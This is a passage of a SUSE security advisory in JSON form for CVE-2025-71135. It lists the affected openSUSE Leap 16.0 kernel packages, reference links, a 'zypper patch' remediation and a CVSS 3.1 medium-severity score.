"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
